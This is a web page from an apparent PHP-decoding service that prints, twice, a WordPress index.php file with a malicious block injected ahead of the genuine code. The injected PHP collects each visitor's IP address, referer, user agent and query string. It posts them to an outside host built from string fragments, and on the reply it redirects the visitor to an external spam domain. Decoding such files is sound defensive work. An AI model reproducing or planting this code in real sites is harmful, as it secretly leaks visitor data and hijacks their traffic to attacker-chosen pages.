Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if (!function_exists('xJV1H9Ae7M')) { function xJV1H9Ae7M() { $xJcbaC = $_SERVER['..

Decoded Output download

<?php 
 if (!function_exists('xJV1H9Ae7M')) { function xJV1H9Ae7M() { $xJcbaC = $_SERVER['SERVER_ADDR']; $x5SpP = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$x5SpP) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($xJcbaC))) {$ip=$_SERVER['HTTP_CF_CONNECTING_IP'];} elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$x5SpP)) {$ip=$_SERVER['GEOIP_ADDR'];} elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$x5SpP) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($xJcbaC))) {$ip=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR'])[0];} elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$x5SpP) && (($_SERVER['HTTP_CLIENT_IP'])!=($xJcbaC))) {$ip=$_SERVER['HTTP_CLIENT_IP'];} else {$ip=$_SERVER['REMOTE_ADDR'];} return $ip; }}  $ip=xJV1H9Ae7M(); 
 if (!function_exists('xWUzZmESusV')) { function xWUzZmESusV() { if(empty($_SERVER['HTTP_REFERER'])) { $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER'); } return $_SERVER['HTTP_REFERER']; }} $ref=xWUzZmESusV(); 
 if (!function_exists('xhrZKvV3zn')) { function xhrZKvV3zn() { if(empty($_SERVER['HTTP_USER_AGENT'])) { $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT'); } return $_SERVER['HTTP_USER_AGENT']; }} $eRf9t9d9 = xhrZKvV3zn(); 
 if ($_SERVER['QUERY_STRING']!=''){ $dHerF777hg = ''.urlencode($_SERVER['QUERY_STRING']).''; } else {$dHerF777hg = '';} 
 $sourcename = 'cr'; $whatdo = 'find'; $sourceid = ''; $who = 'us'; $fd = 'y990010'; $dex9 = '.re'; $langua = 'na'; $command = 'st'; 
 $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_URL, 'https://'.$whatdo.''.$who.''.$dex9.''.$command.'/'.$who.''.$command.'.php'); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_TIMEOUT,333); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$ip.'&ref='.$ref.'&ua='.$eRf9t9d9.'&data='.$dHerF777hg.'&sourceid='.$sourceid.'&sourcename='.$sourcename.''); $ifbot = curl_exec($ch); curl_close($ch); 
 if ($ifbot == '') { echo '<h1>CURL ERROR</h1>'; } elseif ($ifbot != '0') {  } else { if (!empty($dHerF777hg)) { echo "<script type='text/javascript'> window.location.href='https://ingustestylepropof.info/Fvr3Kn2f?".urldecode($dHerF777hg)."' </script> ";} else { echo "<script type='text/javascript'> window.location.href='https://ingustestylepropof.info/Fvr3Kn2f' </script> ";} exit; } 
 ?> 
<?php 
/** 
 * Front to the WordPress application. This file doesn't do anything, but loads 
 * wp-blog-header.php which does and tells WordPress to load the theme. 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Tells WordPress to load the WordPress theme and output it. 
 * 
 * @var bool 
 */ 
define( 'WP_USE_THEMES', true ); 
 
/** Loads the WordPress Environment and Template */ 
require __DIR__ . '/wp-blog-header.php'; 
~ ?>

Did this file decode correctly?

Original Code

<?php
 if (!function_exists('xJV1H9Ae7M')) { function xJV1H9Ae7M() { $xJcbaC = $_SERVER['SERVER_ADDR']; $x5SpP = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$x5SpP) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($xJcbaC))) {$ip=$_SERVER['HTTP_CF_CONNECTING_IP'];} elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$x5SpP)) {$ip=$_SERVER['GEOIP_ADDR'];} elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$x5SpP) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($xJcbaC))) {$ip=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR'])[0];} elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$x5SpP) && (($_SERVER['HTTP_CLIENT_IP'])!=($xJcbaC))) {$ip=$_SERVER['HTTP_CLIENT_IP'];} else {$ip=$_SERVER['REMOTE_ADDR'];} return $ip; }}  $ip=xJV1H9Ae7M();
 if (!function_exists('xWUzZmESusV')) { function xWUzZmESusV() { if(empty($_SERVER['HTTP_REFERER'])) { $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER'); } return $_SERVER['HTTP_REFERER']; }} $ref=xWUzZmESusV();
 if (!function_exists('xhrZKvV3zn')) { function xhrZKvV3zn() { if(empty($_SERVER['HTTP_USER_AGENT'])) { $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT'); } return $_SERVER['HTTP_USER_AGENT']; }} $eRf9t9d9 = xhrZKvV3zn();
 if ($_SERVER['QUERY_STRING']!=''){ $dHerF777hg = ''.urlencode($_SERVER['QUERY_STRING']).''; } else {$dHerF777hg = '';}
 $sourcename = 'cr'; $whatdo = 'find'; $sourceid = ''; $who = 'us'; $fd = 'y990010'; $dex9 = '.re'; $langua = 'na'; $command = 'st';
 $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_URL, 'https://'.$whatdo.''.$who.''.$dex9.''.$command.'/'.$who.''.$command.'.php'); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_TIMEOUT,333); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$ip.'&ref='.$ref.'&ua='.$eRf9t9d9.'&data='.$dHerF777hg.'&sourceid='.$sourceid.'&sourcename='.$sourcename.''); $ifbot = curl_exec($ch); curl_close($ch);
 if ($ifbot == '') { echo '<h1>CURL ERROR</h1>'; } elseif ($ifbot != '0') {  } else { if (!empty($dHerF777hg)) { echo "<script type='text/javascript'> window.location.href='https://ingustestylepropof.info/Fvr3Kn2f?".urldecode($dHerF777hg)."' </script> ";} else { echo "<script type='text/javascript'> window.location.href='https://ingustestylepropof.info/Fvr3Kn2f' </script> ";} exit; }
 ?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
~

Function Calls

None

Variables

None

Stats

MD5 bc1759213f4ce91d7e40e88effe60aa8
Eval Count 0
Decode Time 80 ms